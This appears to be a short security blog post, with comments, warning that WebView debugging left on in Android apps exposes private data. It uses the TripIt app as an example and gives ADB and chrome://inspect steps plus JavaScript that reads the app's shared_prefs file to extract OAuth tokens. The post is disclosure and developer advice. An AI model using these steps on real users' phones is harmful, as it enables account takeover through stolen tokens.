WebView debugging can be enabled via “WebView.setWebContentsDebuggingEnabled(true)”. Leaving WebView debugging enabled in production Android apps is a bad idea. Anyone who gets hold of the unlocked phone can access the app’s data forever.
Consider this, the Tripit app exposes WebView debugging, and by using that I can read all the files inside the private data directory. As an example, by connecting a user’s unlocked mobile phone to my laptop, I can extract TripIt OAuthToken.
First, connect the phone via ADB, open chrome://inspect in the Chrome browser, click “inspect” below “com.tripit” and enter the following in there.
window.location="file:///data/data/com.tripit/shared_prefs/com.tripit.xml" document.getElementsByTagName("html")[0].innerHTML
Now, you can see all the entries like
<string name=”oauthTokenSecret”>f731d36cdbf9006f917307…</string>
These auth tokens can be copied and used to get permanent access to the user’s TripIt account.
Hey Where I Have to Put This Code
Updated the blog post with more details “First, connect the phone via ADB, open chrome://inspect in the Chrome browser, click “inspect” below “com.tripit” and enter the following in there.”
What’s the impact if we leave the code there and set the value to 0(false)?
Yeah, `false` is fine there.